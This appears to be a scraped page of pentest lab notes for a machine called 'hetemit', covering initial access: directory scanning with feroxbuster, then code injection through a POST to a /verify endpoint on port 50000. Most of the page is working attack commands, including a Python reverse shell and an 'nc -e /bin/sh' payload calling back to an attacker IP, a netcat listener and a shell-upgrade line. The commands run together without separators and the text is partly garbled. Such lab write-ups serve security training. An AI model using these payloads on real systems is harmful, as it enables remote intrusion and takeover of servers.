http [Initial Access]
At port 80

At port 50000

Looking At Subdirectory:



Checking background of website at 50000 [Working]






Last updated











Last updated
feroxbuster -u http://$hetemit --filter-status 404feroxbuster -u http://$hetemit:50000 --filter-status 40450000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)curl "http://$hetemit:50000/verify" -X POST --data "code=4*2"curl "http://$hetemit:50000/verify" -X POST --data "code=export RHOST=\"192.168.45.230\";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'"sudo rlwrap -cAr nc -lvnp 80curl "http://$hetemit:50000/verify" -X POST --data "code=os.system('nc $IP_KALI 80 -e /bin/sh')"(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')